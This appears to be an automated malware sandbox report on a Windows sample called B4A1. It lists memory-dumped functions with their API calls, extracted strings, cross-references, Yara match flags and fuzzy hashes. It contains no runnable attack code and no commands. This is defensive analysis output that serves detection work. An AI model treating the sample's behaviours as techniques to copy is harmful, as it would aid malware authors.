Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

Function 0040C583 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C

Function 0043AAA0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

Function 0043AA80 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8

Function 0095ACED Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0095AD3E

Memory Dump Source

Source File: 00000001.00000002.2189547236.000000000095A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0095A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_95a000_B4A1.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 99f3f0030cee7426e5b3451180b55ef58d0112c30be9ee1d038e7c91c0e03559
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 54112B79A00208EFDB01DF99C985E99BBF5AF08351F058094F9489B362D371EA50DB81

Non-executed Functions

Function 00426B50 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 439COMMON

Download Yara Rule

Strings

+K!M, xrefs: 00427356
*W.Y, xrefs: 0042731F
U'g), xrefs: 004272F3
NO, xrefs: 00427361
{7y9, xrefs: 004272C7
$&, xrefs: 004275AF
!, xrefs: 00427452
bweM, xrefs: 004276F0
EG, xrefs: 0042740B
g#X%, xrefs: 004272E8
w?n!, xrefs: 004272DD
>C7E, xrefs: 00427340
UGBY, xrefs: 00427708
;[0], xrefs: 0042732A
FOEH, xrefs: 0042771E
l+X-, xrefs: 004272FE

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
API String ID: 0-3492884535
Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A

Function 00423860 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 501COMMON

Download Yara Rule

Strings

WE, xrefs: 00423D04
/G$I, xrefs: 00423E16
{\}, xrefs: 00423E3E
7N1@, xrefs: 00423ED0, 00423EE1
Fg)i, xrefs: 00423E56
OU, xrefs: 00423CFC
A[, xrefs: 00423D14

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
API String ID: 0-1763234448
Opcode ID: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
Opcode Fuzzy Hash: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86

Function 0041CB40 Relevance: 10.7, Strings: 8, Instructions: 658COMMON

Download Yara Rule

Strings

Q, xrefs: 0041CF39
0u4w, xrefs: 0041D236
SV, xrefs: 0041CF29
_q, xrefs: 0041D1C5
p8`;, xrefs: 0041CDBD
qr, xrefs: 0041D063
xy, xrefs: 0041D23E
KT, xrefs: 0041CF31

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
API String ID: 0-1826372655
Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A

Function 00419F30 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1664COMMON

Download Yara Rule

APIs

Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

FreeLibrary.KERNEL32(?), ref: 0041A6BD
FreeLibrary.KERNEL32(?), ref: 0041A77B

Strings

/ , xrefs: 0041A402
/,-, xrefs: 0041A991
46, xrefs: 0041A3EA

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: / $/,-$46
API String ID: 764372645-479303636
Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B

Function 024CA197 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1664COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 024CA924
FreeLibrary.KERNEL32(?), ref: 024CA9E2

Strings

/ , xrefs: 024CA669
46, xrefs: 024CA651
/,-, xrefs: 024CABF8

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: / $/,-$46
API String ID: 3664257935-479303636
Opcode ID: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
Instruction ID: 3b080c6cc3b7395323015e600c4c24ac9995341982c449af0507f398d63234fe
Opcode Fuzzy Hash: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
Instruction Fuzzy Hash: 86B2567A6483549FE3208FAAD88477BBBD3EBC1304F28C42ED9C59B311D77598458B92

Function 00408F50 Relevance: 9.0, Strings: 7, Instructions: 223COMMON

Download Yara Rule

Strings

x|j~, xrefs: 0040904D
jqci, xrefs: 0040901D
z/6q, xrefs: 0040903D
|$Nb, xrefs: 00409025
wkw6, xrefs: 00409045
(, xrefs: 00409065
ye{|, xrefs: 00409035

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
API String ID: 0-2309992716
Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A

Function 024B91B7 Relevance: 9.0, Strings: 7, Instructions: 223COMMON

Download Yara Rule

Strings

ye{|, xrefs: 024B929C
|$Nb, xrefs: 024B928C
(, xrefs: 024B92CC
jqci, xrefs: 024B9284
wkw6, xrefs: 024B92AC
z/6q, xrefs: 024B92A4
x|j~, xrefs: 024B92B4

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
API String ID: 0-2309992716
Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction ID: 264051d89883de0bac553e4676e9879e91e91c2cdface3263b5bddf64fe56941
Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction Fuzzy Hash: 4761387154C3C28AD3128F3988A07ABFFE09F97204F18596EE4D14B392D369C609DB26

Function 024B8AB7 Relevance: 7.7, APIs: 5, Instructions: 194threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 024B8B83
GetCurrentThreadId.KERNEL32 ref: 024B8B8C
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 024B8C42
GetForegroundWindow.USER32 ref: 024B8C9A

Part of subcall function 024BC7B7: CoInitializeEx.COMBASE(00000000,00000002), ref: 024BC7CA

Part of subcall function 024BB5F7: FreeLibrary.KERNEL32(024B8D1F), ref: 024BB5FD
Part of subcall function 024BB5F7: FreeLibrary.KERNEL32 ref: 024BB61E

ExitProcess.KERNEL32 ref: 024B8D38

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
Instruction ID: ce58a74835f727767103f82e238357bcefb8eec7c9c7edbf7e4d70bd1c31ab11
Opcode Fuzzy Hash: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
Instruction Fuzzy Hash: F85187B7F102180BD71CAEBACC5679A758B8FC5710F1E813E9945DB3D5EEB8880182E5

Function 0041E7C0 Relevance: 5.8, Strings: 4, Instructions: 779COMMON

Download Yara Rule

Strings

", xrefs: 0041F121
hI, xrefs: 0041E98F
-+, xrefs: 0041F11A
/, xrefs: 0041E9BE

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: "$-+$/$hI
API String ID: 0-2772680581
Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A

Function 024CEA27 Relevance: 5.8, Strings: 4, Instructions: 779COMMON

Download Yara Rule

Strings

hI, xrefs: 024CEBF6
", xrefs: 024CF388
/, xrefs: 024CEC25
-+, xrefs: 024CF381

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: "$-+$/$hI
API String ID: 0-2772680581
Opcode ID: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
Instruction ID: 5cc1f451e893711a850c8593008402db56316fc86f7f04eabffc75589d187711
Opcode Fuzzy Hash: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
Instruction Fuzzy Hash: FB42377890C3818FD725CF29C840A6FBBE2AF91314F19466EE8E55B392D735C50ACB52

Function 024CD230 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

xy, xrefs: 024CD4A5
_q, xrefs: 024CD42C
0u4w, xrefs: 024CD49D
qr, xrefs: 024CD2CA

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: 0u4w$_q$qr$xy
API String ID: 0-1225007230
Opcode ID: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
Instruction ID: faee6f795244eeb88064123cae7f3a169dfb7c0ae236204497693372cdcf7223
Opcode Fuzzy Hash: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
Instruction Fuzzy Hash: B19112B5908310CBC718DF58C89276BB7F1EF95324F18992DE8CA8B391E3749505C75A

Function 0042CA49 Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

Hs, xrefs: 0042CCE3
,JHj, xrefs: 0042CD5D
v, xrefs: 0042CDC6
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96

Function 024DCCB0 Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

v, xrefs: 024DD02D
,JHj, xrefs: 024DCFC4
bc, xrefs: 024DD104
Hs, xrefs: 024DCF4A

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction ID: f5080b6d56dbca85b0e82930d977341fe5eb2497007995b1150ecbdd472160ea
Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction Fuzzy Hash: AA914B71A083908BE3258B39C4617ABBBD2AFD3318F19896ED4DA9B782C7754405CB52

Function 0042CB22 Relevance: 5.3, Strings: 4, Instructions: 299COMMON

Download Yara Rule

Strings

Hs, xrefs: 0042CCE3
,JHj, xrefs: 0042CD5D
v, xrefs: 0042CDC6
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96

Function 024DCD89 Relevance: 5.3, Strings: 4, Instructions: 299COMMON

Download Yara Rule

Strings

v, xrefs: 024DD02D
,JHj, xrefs: 024DCFC4
bc, xrefs: 024DD104
Hs, xrefs: 024DCF4A

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction ID: 9e2c775d943ff442ab04e7f7695c6240e7159c68abf71a08bd09ac78fdc75b2b
Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction Fuzzy Hash: DA914B71A183D08BE3358B39C4617ABBBD2AFD3218F18896EC4DA9B782C7754405CB52

Function 0042CAD0 Relevance: 5.3, Strings: 4, Instructions: 295COMMON

Download Yara Rule

Strings

Hs, xrefs: 0042CCE3
,JHj, xrefs: 0042CD5D
v, xrefs: 0042CDC6
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96

Function 024DCD37 Relevance: 5.3, Strings: 4, Instructions: 295COMMON

Download Yara Rule

Strings

v, xrefs: 024DD02D
,JHj, xrefs: 024DCFC4
bc, xrefs: 024DD104
Hs, xrefs: 024DCF4A

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction ID: c19ceac2072b534c9d4a982d474ff59a47ab444935fbca6ebe0d47dc0f35560e
Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction Fuzzy Hash: DF914B71A083D08BE3358B39C4617ABBBD2AFD3218F18896ED4D99B782C7754409CB52

Function 0042CB11 Relevance: 5.3, Strings: 4, Instructions: 271COMMON

Download Yara Rule

Strings

Hs, xrefs: 0042CCE3
,JHj, xrefs: 0042CD5D
v, xrefs: 0042CDC6
bc, xrefs: 0042CE9D

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96

Function 024DCD78 Relevance: 5.3, Strings: 4, Instructions: 271COMMON

Download Yara Rule

Strings

v, xrefs: 024DD02D
,JHj, xrefs: 024DCFC4
bc, xrefs: 024DD104
Hs, xrefs: 024DCF4A

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction ID: 93fe32b63ae10e3e555cfe7f1b925a6b47f2e6e3bc67a4f8568b57eb9f30bd30
Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction Fuzzy Hash: DD8149729083D08BE335CF3984617ABBBD2AFE3208F19895EC4D95B786C7754409CB52

Function 024D4031 Relevance: 5.1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

Strings

7N1@, xrefs: 024D4137, 024D4148
Fg)i, xrefs: 024D40BD
/G$I, xrefs: 024D407D
{\}, xrefs: 024D40A5

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID:
String ID: /G$I$7N1@$Fg)i${\}
API String ID: 0-149357369
Opcode ID: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
Instruction ID: 5f38fd0c82295007bdc4d2c4a52cbd00a7c14c95e74c8965b44bbb8bfb59b678
Opcode Fuzzy Hash: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
Instruction Fuzzy Hash: 872188B551D3809BC314CF66884161BFBE2BBD2704F29A92DF0C85B255D7748902CF8B

Function 00417DEE Relevance: 4.7, Strings: 3, Instructions: 998COMMON

Download Yara Rule

Strings

,, xrefs: 004183A1
r}A, xrefs: 00417D60
i, xrefs: 00417B2A

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: InitializeThunk
String ID: ,$i$r}A
API String ID: 2994545307-2114006112
Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796

Function 0041759F Relevance: 4.4, Strings: 3, Instructions: 671COMMON

Download Yara Rule

Strings

gfff, xrefs: 00417747
r}A, xrefs: 00417D60
i, xrefs: 00417B2A

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: gfff$i$r}A
API String ID: 0-3931832132
Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786

Function 0041D380 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

|F, xrefs: 0041D40A
34, xrefs: 0041D46A
C], xrefs: 0041D471

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: 34$C]$|F
API String ID: 0-2804560523
